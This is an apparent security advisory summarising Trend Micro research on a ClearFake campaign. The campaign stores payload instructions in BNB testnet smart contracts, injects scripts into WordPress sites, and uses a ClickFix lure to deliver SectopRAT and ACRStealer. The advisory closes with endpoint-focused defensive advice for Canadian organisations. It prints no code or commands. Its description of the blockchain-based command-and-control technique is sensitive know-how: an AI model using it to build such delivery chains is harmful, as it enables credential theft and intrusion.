What Happened
Trend Micro researchers have documented a ClearFake campaign that uses a technique called EtherHiding to store malware payload instructions inside BNB Smart Chain testnet smart contracts. When a victim visits a compromised WordPress site, injected base64-encoded JavaScript retrieves an ABI string from the blockchain, loads the associated smart contract, and receives the current attack payload — all over standard HTTPS to legitimate Binance infrastructure.
The campaign simultaneously delivers two payloads: SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ credential-stealing tool. The routing logic detects the victim’s operating system and serves separate payloads for Windows and macOS. A ClickFix social engineering overlay on the compromised site prompts the victim to run the payload manually. Trend Micro found that four smart contracts shared a single deployer wallet, with the oldest contract deployed nearly a year before the analysis — confirming this is a long-running, maintained campaign.
Source: Trend Micro
Why This Matters for Canadian Organizations
Traditional threat intelligence and blocking infrastructure targets attacker-controlled domains and IP addresses. Blockchain-based C2 removes that attack surface entirely. Because the BNB Smart Chain testnet is a legitimate public blockchain service, network defenders cannot block the C2 channel without blocking all Binance-related infrastructure — a step no organization is realistically going to take. The instructions stored on-chain are also immutable: law enforcement takedowns, domain seizures, and hosting provider abuse reports are ineffective against smart contracts.
Canadian organizations running large WordPress fleets — government portals, media organizations, educational institutions, municipal websites — face direct exposure as potential delivery vectors for this campaign. The ClickFix overlay is a familiar delivery mechanism that bypasses email security entirely, targeting users who browse to compromised legitimate sites. SectopRAT’s session hijacking capability means an infected workstation in a Canadian bank, insurer, or government department can give attackers authenticated access to corporate web applications, bypassing multi-factor authentication.
The malware also targets macOS — a platform common in Canadian creative, technology, and professional services environments, where endpoint detection coverage is often weaker than on Windows. Under PIPEDA, any breach resulting from a successful SectopRAT or ACRStealer infection that accesses personal information triggers notification obligations.
What to Do
Defenders should look at this campaign from the endpoint perspective rather than the network perspective. Block or alert on PowerShell and scripting engine executions launched from browser processes — the ClickFix delivery mechanism relies on a user pasting and running a command from the browser overlay. Ensure endpoint detection tools are configured to flag SectopRAT and ACRStealer indicators published by Trend Micro.
WordPress site operators should audit their installations for unauthorized JavaScript injections. Review file integrity monitoring alerts and server access logs for the past year, given how long this campaign has been running. Keep WordPress core, plugins, and themes current — initial compromise in these campaigns typically exploits known plugin vulnerabilities.
For security architecture teams: recognize that blockchain-based C2 represents a class of infrastructure that traditional domain-reputation and IP-block approaches cannot disrupt. Detection must shift to behavioural indicators at the endpoint. Document this technique in your threat models for board-level and insurance reporting purposes.
